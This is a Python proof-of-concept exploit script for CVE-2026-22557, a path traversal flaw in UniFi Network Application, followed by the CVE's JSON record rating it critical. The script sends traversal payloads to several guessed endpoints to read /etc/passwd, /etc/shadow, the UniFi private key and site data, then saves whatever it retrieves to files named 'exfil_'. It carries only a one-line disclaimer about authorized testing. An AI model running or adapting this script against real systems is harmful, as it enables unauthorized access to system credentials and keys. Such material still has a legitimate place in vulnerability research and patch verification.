CVE-2026-22557

import requests import urllib.parse # CVE-2026-22557 Path Traversal PoC for UniFi Network Application # Target: UniFi Network Application vulnerable instance def exploit_cve_2026_22557(target_url): """ Exploit Path Traversal vulnerability in UniFi Network Application to read arbitrary files from the underlying system. """ # Target endpoint - adjust based on actual vulnerable endpoint # Common endpoints in UniFi that might be vulnerable: # /api/s/default/admin/ - admin endpoints # /api/upload/ - file upload endpoints # /download/ - file download endpoints target = target_url.rstrip('/') # Path traversal payloads to test payloads = [ "../../../../etc/passwd", "../../../../etc/shadow", "..\..\..\..\windows\win.ini", "../../../../var/lib/unifi/key.pem", "../../../../usr/lib/unifi/data/sites.json" ] print(f"[*] Testing CVE-2026-22557 on {target}") print(f"[*] Target: UniFi Network Application") print(f"[*] Vulnerability: Path Traversal") print("-" * 50) for payload in payloads: try: # Test different endpoints with path traversal endpoints = [ f"{target}/api/s/default/admin/{payload}", f"{target}/download/{payload}", f"{target}/api/upload/{payload}" ] for endpoint in endpoints: print(f"\n[+] Testing: {endpoint}") # Send request with path traversal headers = { 'User-Agent': 'UniFi Network Scanner', 'Accept': '*/*' } response = requests.get(endpoint, headers=headers, timeout=10, verify=False) if response.status_code == 200: print(f"[+] SUCCESS! File content retrieved:") print(response.text[:500]) # Save to file for analysis filename = f"exfil_{payload.replace('/', '_').replace('\\', '_')}.txt" with open(filename, 'w') as f: f.write(response.text) print(f"[+] Content saved to {filename}") elif response.status_code == 403: print(f"[-] Access Forbidden (403)") elif response.status_code == 404: print(f"[-] Endpoint not found (404)") else: print(f"[-] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[*] PoC execution completed") print("[*] Note: This is for authorized security testing only") # Main execution if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2026-22557.py <target_url>") print("Example: python cve-2026-22557.py https://unifi.local:8443") sys.exit(1) target_url = sys.argv[1] exploit_cve_2026_22557(target_url)

{"cve": {"id": "CVE-2026-22557", "sourceIdentifier": "[email protected]", "published": "2026-03-19T15:16:23.533", "lastModified": "2026-04-30T16:14:36.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A malicious actor with access to the network could exploit a Path Traversal vulnerability found in the UniFi Network Application to access files on the underlying system that could be manipulated to access an underlying account."}, {"lang": "es", "value": "Un actor malicioso con acceso a la red podría explotar una vulnerabilidad de salto de ruta encontrada en la aplicación UniFi Network para acceder a archivos en el sistema subyacente que podrían ser manipulados para acceder a una cuenta subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-062-062/c29719c0-405e-4d4a-8f26-e343e99f931b", "source": "[email protected]"}]}}